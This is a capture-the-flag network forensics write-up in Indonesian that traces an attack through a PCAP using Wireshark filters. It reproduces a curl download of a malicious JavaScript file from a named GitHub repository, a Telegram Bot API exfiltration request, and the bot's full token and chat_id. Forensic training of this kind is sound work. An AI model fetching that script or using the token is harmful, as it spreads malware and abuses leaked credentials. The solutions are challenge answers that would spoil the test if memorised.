Network Forensics

Challenge

Scenario: Attacker github username?
Flag Format: SOC{username}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu github username dari attacker. Kita bisa mencari tahu hal tersebut dengan cara melihat file PCAP yang diberikan dan melakukan filtering menggunakan http.host contains "github".

Figure 1: Menampilkan hasil filtering

Dari gambar di atas kita bisa melihat bahwa ada request ke github GET/samxmrhacker/envil/raw/refs/heads/main/get.js HTTP/1.1, setelah kita follow TCP Stream kita bisa melihat bahwa github username dari attacker adalah samxmrhacker.

Challenge

Scenario: Flexis AI Server has Public IP & Private IP, we guess that they might use NAT. as Network Forensic Analyst, identify the Victim Private IP Address
Flag Format: SOC{IP_ADDRESS}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu private IP address dari Flexis AI Server. Kita bisa mencari tahu hal tersebut dengan cara melihat file PCAP yang diberikan lalu ke Statistics -> Endpoints -> IPv4.

Figure 1: Menampilkan hasil dari Statistics -> Endpoints -> IPv4

Dari gambar di atas awalnya kita akan melihat banyak IP address, namun kita bisa memfilter tersebut dengan cara melihat kolom "Bytes" dan mencari IP address yang memiliki jumlah byte terbanyak. Saya melihat ada IP address 10.78.108.211 yang memiliki jumlah byte terbanyak sebesar 18 MB dan packets 217.786. Jadi bisa kita simpulkan flag nya adalah 10.78.108.211.

Challenge

Scenario: The attacker downloaded a malicious JavaScript file from GitHub. Extract the complete URL of this script from the network traffic.
Flag Format: SOC{url}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu URL dari malicious JavaScript file yang diunduh oleh attacker. sebelumnya kita sudah menemukan request ke github GET/samxmrhacker/envil/raw/refs/heads/main/get.js HTTP/1.1, setelah kita follow TCP Stream menampilkan

GET /samxmrhacker/envil/raw/refs/heads/main/get.js HTTP/1.1
Host: github.com
User-Agent: curl/7.68.0
Accept: */*
Connection: close

Dari gambar di atas kita bisa melihat URL dari malicious JavaScript file yang diunduh oleh attacker adalah https://github.com/samxmrhacker/envil/raw/refs/heads/main/get.js.

Challenge

Scenario: Do you think we know who own those Telegram bot, or where the message has been sent? use your Forensic skill to uncover the chat_id
Flag Format: SOC{chat_id}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu chat_id dari Telegram bot yang digunakan oleh attacker. kita perlu mencari tahu request ke telegram disini saya melakukan filterisasi lagi menggunakan http.host contains "telegram", setelah melakukan filterisasi saya menemukan request POST /bot8368719709:AAH0xkCwgOApvV8q_JK-hboaGmRYv-TwicI/sendDocument HTTP/1.1, setelah saya follow TCP Stream menampilkan

Figure 1: Menampilkan request ke Telegram

Figure 2: Menampilkan response dari Telegram

Dari gambar di atas kita bisa melihat chat_id dari Telegram bot yang digunakan oleh attacker adalah 7871422807.

Challenge

Scenario: The attacker exfiltrated data using a Telegram bot. Extract the bot token from the network traffic.
Flag Format: Flag Format: SOC{BOTID:TOKEN}

Solution

Pada challenge kali ini kita diminta untuk mencari tahu bot token dari Telegram bot yang digunakan oleh attacker. karena sebelumnya kita sudah menemukan response dari Telegram bot yang dimana disana juga berisi bot token dari Telegram bot yang digunakan oleh attacker yaitu 8368719709:AAH0xkCwgOApvV8q_JK-hboaGmRYv-TwicI.